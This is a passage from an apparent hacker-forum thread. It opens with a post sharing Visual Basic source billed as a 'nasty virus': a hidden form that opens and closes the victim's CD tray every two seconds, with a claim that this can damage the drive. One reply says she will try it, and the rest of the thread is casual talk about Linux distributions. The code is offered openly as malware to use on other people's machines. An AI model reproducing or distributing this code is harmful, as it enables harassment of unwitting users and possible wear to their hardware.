source code for an excellent virus(VB)

Discussion about hacker.org's server
User avatar
treborguile
Posts: 53
Joined: Thu Aug 23, 2007 2:22 am
Location: sniping area

source code for an excellent virus(VB)

Post by treborguile »

Ok this virus is very nasty...it causes the CD drive 2 eject and load at intervals of 2 seconds,u cant stop it directly.......it can even damage ur CD drives....ok here goes the code ....this shud b coded in VB.....


Private Declare Function mciSendString Lib "winmm.dll" Alias _
"mciSendStringA" (ByVal lpstrCommand As String, ByVal lpstrReturnString As String, _
ByVal uReturnLength As Long, ByVal hwndCallback As Long) As Long
Dim retvalue As Long

Private Sub Form_Load()
Form1.Hide
t.interval=2000
End Sub

Private Sub t_Timer()
Static a As Boolean
a = Not (a)
Select Case a
Case True
retvalue = mciSendString("set CDAudio door open", returnstring, 127, 0)
Case False
retvalue = mciSendString("set CDAudio door closed", returnstring, 127, 0)
End Select
End Sub
Image
  Image
Image
User avatar
alina
Posts: 242
Joined: Sat Aug 25, 2007 5:45 pm
Location: DarkNet

Post by alina »

wow ths i will try it..hope i can do that :? anyway ths
<<D.A.>>
Posts: 647
Joined: Wed Aug 15, 2007 5:16 pm
Location: nowhere

Post by <<D.A.>> »

Yeah, linux REALLY lacks software... VIRUSES! :cry: It doesn't support viruses! :lol:
User avatar
treborguile
Posts: 53
Joined: Thu Aug 23, 2007 2:22 am
Location: sniping area

Post by treborguile »

<<D.A.>> wrote:Yeah, linux REALLY lacks software... VIRUSES! :cry: It doesn't support viruses! :lol:
hahaha doesn't support viruses??
Image
  Image
Image
User avatar
alina
Posts: 242
Joined: Sat Aug 25, 2007 5:45 pm
Location: DarkNet

Post by alina »

but guys i had linux and i don't like it at all ..is it so good? ..mine worked for an hour then i had to change it... :? :?
<<D.A.>>
Posts: 647
Joined: Wed Aug 15, 2007 5:16 pm
Location: nowhere

Post by <<D.A.>> »

For an hour? Let me gues... It was Mandriva Linux 2007.1? Am i right? :lol:
User avatar
alina
Posts: 242
Joined: Sat Aug 25, 2007 5:45 pm
Location: DarkNet

Post by alina »

:D well yes..
<<D.A.>>
Posts: 647
Joined: Wed Aug 15, 2007 5:16 pm
Location: nowhere

Post by <<D.A.>> »

:lol: This is one of the worst Linux distributions there ever was. Ain't nothing works in there. You should try Slackware linux 12. Also you can try Backtrack 2 - Linux distribution specially designed for hackers (especially for blackhat :-D ). It's a liveCD distribution, so you don't even have to install it to use it - it boots from CD. But it lacks such thungs as office suite and other useful software.
User avatar
alina
Posts: 242
Joined: Sat Aug 25, 2007 5:45 pm
Location: DarkNet

Post by alina »

wow ths a lot ..stupid me :oops: well....this is me sometimes stupid sometimes smart :oops:
<<D.A.>>
Posts: 647
Joined: Wed Aug 15, 2007 5:16 pm
Location: nowhere

Post by <<D.A.>> »

Take it easy... Most of Linux newbies google for 'linux download'. And, probably, the first link is Mandriva Linux... For example, I've been using that distro for a few month, until it crashed, only then I started looking for some other distro...
User avatar
alina
Posts: 242
Joined: Sat Aug 25, 2007 5:45 pm
Location: DarkNet

Post by alina »

ths u are the best i will look for the ones u said ...huggsss :wink:
User avatar
treborguile
Posts: 53
Joined: Thu Aug 23, 2007 2:22 am
Location: sniping area

Post by treborguile »

hahaha i've made my own linux
try google search LINUX FROM SCRATCH
and you can make it yourself too 8)
Image
  Image
Image
User avatar
jack krauser
Posts: 1005
Joined: Wed Aug 29, 2007 5:45 pm
Location: greece
Contact:

Post by jack krauser »

treborguile wrote:hahaha i've made my own linux
try google search LINUX FROM SCRATCH
and you can make it yourself too 8)
i will search and tell you :wink:
hacker is a life style. its one that alters how you think, you perception of reality, your way of dealing with things in general, as well as things so common as how you talk, how you carry yourself, and even when and how long you sleep.

by Loyal_Dark
User avatar
alina
Posts: 242
Joined: Sat Aug 25, 2007 5:45 pm
Location: DarkNet

Post by alina »

ok i will search it too ths ... :)
It's like I'm a fake girl
It's like a stupid thing to do
It's like the hacker didn't gave out any personal information just to save me this time
It's like it's my last chance
User avatar
jack krauser
Posts: 1005
Joined: Wed Aug 29, 2007 5:45 pm
Location: greece
Contact:

Post by jack krauser »

treborguile wrote:hahaha i've made my own linux
try google search LINUX FROM SCRATCH
and you can make it yourself too 8)
it's very good :wink:
hacker is a life style. its one that alters how you think, you perception of reality, your way of dealing with things in general, as well as things so common as how you talk, how you carry yourself, and even when and how long you sleep.

by Loyal_Dark
Post Reply